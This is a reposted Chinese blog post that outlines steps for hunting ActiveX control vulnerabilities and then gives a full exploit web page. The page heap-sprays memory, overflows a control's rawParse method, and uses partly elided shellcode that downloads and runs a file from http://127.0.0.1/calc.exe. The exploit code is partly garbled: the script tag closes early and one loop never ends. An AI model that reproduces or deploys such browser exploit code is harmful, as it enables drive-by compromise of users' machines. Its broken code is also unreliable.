最近關于ActiveX控件漏洞猛報,利用工具也不少,特将其漏洞挖掘思路整理如下:
(1)下載下傳并安裝欲測試的軟體
(2)使用COM Explorer軟體檢視ActiveX控件的各種屬性
(3)通過VS2005對象浏覽器檢視控件中的變量、函數、函數參數,從中尋找可能存在漏洞的參數。
(4)進行漏洞的測試
(5)編寫漏洞利用網頁
網頁大緻内容如下:
<html>
<object classid="clsid:6BE52E1D-E586-474f-A6E2-1A85A9B4D9FB" id='target'></object>
<body>
<SCRIPT language="javascript">
var shellcode = unescape("%u9090"+"%u9090"+
"%uefe9%u0000%u5a00%ua164%u0030%u0000%u408b%u8b0c" +
。。。。。。(省略)
"%u6946%u656c%u0041%u7468%u7074%u2f3a%u312f%u3732" +
"%u302e%u302e%u312e%u632f%u6c61%u2e63%u7865%u0065");
</script>
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) blockblock = block+block+fillblock;
memory = new Array();
for (x=0; x<300; x++) memory[x] = block + shellcode;
var buffer = '';
while (buffer.length < 4096) buffer+="\x0a\x0a\x0a\x0a";
target.rawParse(buffer);
</body>
</html>
本文轉自 simeon2005 51CTO部落格,原文連結:http://blog.51cto.com/simeon/51083
![主流浏覽器四大綜合性能測試[圖]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)